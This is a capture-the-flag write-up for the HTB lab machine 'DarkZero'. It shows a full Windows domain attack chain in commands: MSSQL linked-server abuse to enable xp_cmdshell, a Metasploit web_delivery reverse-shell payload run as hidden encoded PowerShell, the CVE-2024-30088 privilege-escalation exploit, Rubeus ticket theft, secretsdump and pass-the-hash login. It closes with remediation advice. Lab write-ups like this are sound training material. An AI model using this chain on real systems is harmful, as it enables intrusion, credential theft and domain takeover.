WEB HARD HTB Season 8 · 

DarkZero

Only default shares were present. SMB and BloodHound enumeration did not provide useful results.

Category
WEB
OS
Windows

Table of Contents

Reconnaissance

Target Details

Nmap Results

nmap -p 1-65535 -T4 -A -v 10.10.11.89

Open Ports (DC01):

SMB and Host Enumeration

nxc smb 10.10.11.89 -u 'john.w' -p 'RFulUtONCOL!' --generate-hosts-file /etc/hosts
smbmap -H 10.10.11.89 -d 'darkzero.htb' -u 'john.w' -p 'RFulUtONCOL!'

Only default shares were present. SMB and BloodHound enumeration did not provide useful results.

DNS Enumeration

dig @DC01.darkzero.htb ANY darkzero.htb

Findings:

Initial Access

MSSQL Access and Linked Servers

Connected to MSSQL using the provided credentials:

mssqlclient.py 'darkzero.htb/john.w:RFulUtONCOL!@10.10.11.89' -windows-auth

Attempt to enable xp_cmdshell on DC01 failed due to insufficient privileges:

enable_xp_cmdshell

Enumerated linked servers:

enum_links

Linked Servers:

The link to DC02.darkzero.ext uses darkzero\john.w mapped to remote login dc01_sql_svc.

Switched to the linked server and enabled xp_cmdshell successfully:

use_link "DC02.darkzero.ext"
enable_xp_cmdshell

Meterpreter via MSSQL

Prepared a payload using Metasploit web_delivery:

msfconsole -q -x "use exploit/multi/script/web_delivery ; set payload windows/x64/meterpreter/reverse_tcp ; set LHOST tun0 ; set LPORT 443 ; set target 2 ; exploit -j"

Executed the Base64 payload through xp_cmdshell:

xp_cmdshell "powershell.exe -nop -w hidden -e <base64_payload>"

Result: Meterpreter session as darkzero-ext\svc_sql on 172.16.20.2 (DC02 subnet).

Privilege Escalation - User

Local Exploit: CVE-2024-30088

Used local_exploit_suggester and ran the exploit multiple times until it succeeded:

use multi/recon/local_exploit_suggester
set session 1
run

use exploit/windows/local/cve_2024_30088_authz_basep
set payload windows/x64/meterpreter_reverse_tcp
set session 1
set lhost tun0
set AutoCheck false
run

Result: NT AUTHORITY\SYSTEM shell on 172.16.20.2.

User Flag (DC02)

type C:\Users\Administrator\Desktop\user.txt

Privilege Escalation - Root

Kerberos Ticket Collection with Rubeus

Uploaded and ran Rubeus on DC01 to monitor Kerberos tickets:

cd %temp%
C:\Windows\Temp\Rubeus.exe monitor /interval:1 /nowrap

Triggered ticket generation from DC01 by calling a UNC path via MSSQL:

impacket-mssqlclient 'darkzero.htb/john.w:RFulUtONCOL!'@DC01.darkzero.htb -windows-auth
xp_dirtree \\DC02.darkzero.ext\sfsdafasd

Captured ticket output and converted it:

cat ticket.bs4.kirbi | base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi dc01_admin.ccache
export KRB5CCNAME=dc01_admin.ccache
klist

Dumped secrets using Kerberos authentication:

impacket-secretsdump -k -no-pass 'darkzero.htb/DC01$@DC01.darkzero.htb'

Root Flag (DC01)

Connected via Evil-WinRM with the recovered hash:

evil-winrm -i 10.10.11.89 -u administrator -H 5917507bdf2ef2c2b0a869a1cba40726

type C:\Users\Administrator\Desktop\root.txt

Key Takeaways

  1. Linked SQL servers can silently grant higher privileges and enable remote command execution.
  2. Split-horizon DNS/multihoming can hide services on internal networks and enable lateral movement.
  3. xp_cmdshell is a high-risk feature that enables OS command execution from SQL Server.
  4. Kernel exploits like CVE-2024-30088 can bridge service-level access to SYSTEM.
  5. Kerberos ticket monitoring (Rubeus) reveals service tickets and enables pass-the-ticket workflows.

Tools Used

Flags

User Flag: Retrieved on DC02 (C:\Users\Administrator\Desktop\user.txt)
Root Flag: Retrieved on DC01 (C:\Users\Administrator\Desktop\root.txt)

Remediation Recommendations

Critical Severity

  1. Disable or Restrict xp_cmdshell

    • Issue: SQL Server allowed OS command execution on a linked server.
    • Impact: Remote code execution from database context and lateral movement.
    • Remediation:
      • Disable xp_cmdshell and use least-privilege SQL roles.
      • Enforce strict separation of linked server credentials.
      • Monitor and alert on any xp_cmdshell use.

  2. Harden Linked SQL Server Trusts

    • Issue: Linked server mapping elevated john.w to dc01_sql_svc.
    • Impact: Privilege escalation across SQL hosts.
    • Remediation:
      • Remove unnecessary linked servers and explicit credential mappings.
      • Use constrained delegation with least-privilege service accounts.
      • Require multi-factor auth for privileged SQL logins.

High Severity

  1. Patch Kernel Vulnerabilities (CVE-2024-30088)

    • Issue: Local privilege escalation to SYSTEM.
    • Impact: Full system compromise from service access.
    • Remediation:
      • Apply the latest Windows security updates.
      • Enforce EDR rules to detect privilege escalation behaviors.

  2. Protect Kerberos Ticket Operations

    • Issue: Ticket issuance and monitoring allowed ticket theft and reuse.
    • Impact: Pass-the-ticket attacks and domain compromise.
    • Remediation:
      • Enable Kerberos armoring and enforce AES-only tickets.
      • Restrict service accounts and rotate credentials regularly.
      • Monitor for abnormal TGS requests and Rubeus-like behavior.

Medium Severity

  1. Reduce Service Exposure on Domain Controllers

    • Issue: DC01 exposed MSSQL, WinRM, and multiple RPC endpoints.
    • Impact: Increased attack surface for lateral movement.
    • Remediation:
      • Remove non-essential services from DCs.
      • Segment management services onto admin-only networks.

  2. Split-Horizon DNS Visibility

    • Issue: Dual IPs and internal-only services complicate monitoring.
    • Impact: Hidden interfaces aid lateral movement.
    • Remediation:
      • Document multihomed DCs and apply firewall rules per interface.
      • Log and alert on internal-only service access.